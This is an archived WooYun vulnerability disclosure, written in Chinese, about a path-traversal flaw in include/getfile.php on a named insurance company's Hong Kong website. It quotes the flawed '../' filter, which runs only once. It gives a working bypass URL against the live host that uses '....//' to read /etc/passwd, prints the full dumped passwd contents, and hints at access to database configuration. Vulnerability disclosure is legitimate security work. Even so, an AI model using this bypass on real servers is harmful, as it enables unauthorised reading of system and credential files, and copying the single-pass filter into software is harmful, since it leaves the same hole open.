乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-17: 厂商已经确认,细节仅向厂商公开 2015-12-27: 细节向核心白帽子及相关领域专家公开 2016-01-06: 细节向普通白帽子公开 2016-01-16: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
rt
目标:http://www.hk.cntaiping.com形如,
http://www.hk.cntaiping.com/include/getfile.php?filepath=路径&file=名字+格式&filename=名字
数据库配置信息
----------------------------------------------------------------------------------在include/getfile.php中
$path = '../';$filepath = str_replace("../", "", $filepath);$file = str_replace("../", "", $file);if(is_file($path.$filepath.$file)){ $filerename = $filename; $file = $file; $path = $path.$filepath; $can_download = true;}
有防止跨目录,但可以绕过,如下
http://www.hk.cntaiping.com/include/getfile.php?filepath=....//....//....//etc/&file=passwd&filename=passwd
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bashbin:x:1:1:bin:/bin:/bin/bashdaemon:x:2:2:Daemon:/sbin:/bin/bashftp:x:40:49:FTP account:/srv/ftp:/bin/bashgames:x:12:100:Games account:/var/games:/bin/bashgdm:x:50:104:Gnome Display Manager daemon:/var/lib/gdm:/bin/falsehaldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/falselp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bashmail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/falseman:x:13:62:Manual pages viewer:/var/cache/man:/bin/bashmessagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/falsemysql:x:60:106:MySQL database admin:/var/lib/mysql:/bin/bashnamed:x:44:44:Name server daemon:/var/lib/named:/bin/falsenews:x:9:13:News system:/etc/news:/bin/bashnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bashntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/falsepostfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/falseroot:x:0:0:root:/root:/bin/bashsshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/falsesuse-ncc:x:102:105:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bashuucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bashwwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/falsewebapp:x:1001:100:webapp:/srv/www/htdocs:/bin/bash
你懂的
危害等级:中
漏洞Rank:8
确认时间:2015-12-17 10:50
网站为子站点,涉及到部分内部信息。
暂无